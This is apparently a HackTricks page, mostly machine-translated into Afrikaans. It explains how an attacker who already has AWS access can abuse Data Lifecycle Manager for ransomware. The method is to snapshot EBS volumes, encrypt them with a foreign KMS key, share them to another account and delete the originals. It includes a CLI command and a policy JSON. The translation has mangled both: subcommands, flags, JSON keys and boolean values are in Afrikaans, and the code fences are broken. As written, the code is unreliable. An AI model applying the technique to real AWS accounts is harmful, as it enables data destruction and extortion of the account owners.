AWS - DLM Post Exploitation

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Data Lifecycle Manger (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

'n Ransomware-aanval kan uitgevoer word deur soveel EBS-volume as moontlik te enkripteer en dan die huidige EC2-instanties, EBS-volume en oomblikke uit te vee. Om hierdie skadelike aktiwiteit te outomatiseer, kan 'n persoon Amazon DLM gebruik, deur die oomblikke te enkripteer met 'n KMS-sleutel van 'n ander AWS-rekening en die enkripteerde oomblikke na 'n ander rekening oor te dra. Alternatiewelik kan hulle oomblikke sonder enkripsie na 'n rekening wat hulle bestuur oordra en dit daar enkripteer. Alhoewel dit nie reguit is om bestaande EBS-volume of oomblikke direk te enkripteer nie, is dit moontlik om dit te doen deur 'n nuwe volume of oomblik te skep.

Eerstens sal 'n persoon 'n bevel gebruik om inligting oor volumes te versamel, soos instansie-ID, volume-ID, enkripsiestatus, aanhegstaus en volume-tipe. aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

```afrikaans
aws dlm skep-lewensiklusbeleid --beskrywing "My eerste beleid" --toestand GEAKTIVEER --uitvoeringsrol-arn arn:aws:iam::12345678910:rol/AWSDataLifecycleManagerDefaultRole --beleidsbesonderhede lêer://beleidsbesonderhede.json

A template for the policy document can be seen here:
```bash
```json
{
"Beleidstipe": "EBS_SNAPSHOT_BESTUUR",
"Hulpbrontipes": [
"VOLUME"
],
"Teikentekens": [
{
"Sleutel": "VoorbeeldSleutel",
"Waarde": "VoorbeeldWaarde"
}
],
"Skedules": [
{
"Naam": "DaaglikseSnaps",
"KopieerTegniek": waar,
"TegniekeByvoeg": [
{
"Sleutel": "Snapskepper",
"Waarde": "DLM"
}
],
"VeranderlikeTegnieke": [
{
"Sleutel": "Kostesentrum",
"Waarde": "Finansies"
}
],
"SkepReël": {
"Interval": 24,
"IntervalEenheid": "URE",
"Tye": [
"03:00"
]
},
"BehouReël": {
"Telling": 14
},
"VinnigeHerstelReël": {
"Telling": 2,
"Interval": 12,
"IntervalEenheid": "URE"
},
"KruisStreekKopieerReëls": [
{
"TeikenStreek": "us-west-2",
"Versleutel": waar,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/jou-kms-sleutel-id",
"KopieerTegnieke": waar,
"BehouReël": {
"Interval": 1,
"IntervalEenheid": "DAE"
}
}
],
"DeelReëls": [
{
"TeikenRekeninge": [
"123456789012"
],
"OngedaanmaakInterval": 30,
"OngedaanmaakIntervalEenheid": "DAE"
}
]
}
],
"Parameters": {
"SluitBootVolumeUit": onwaar
}
}

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

Last updated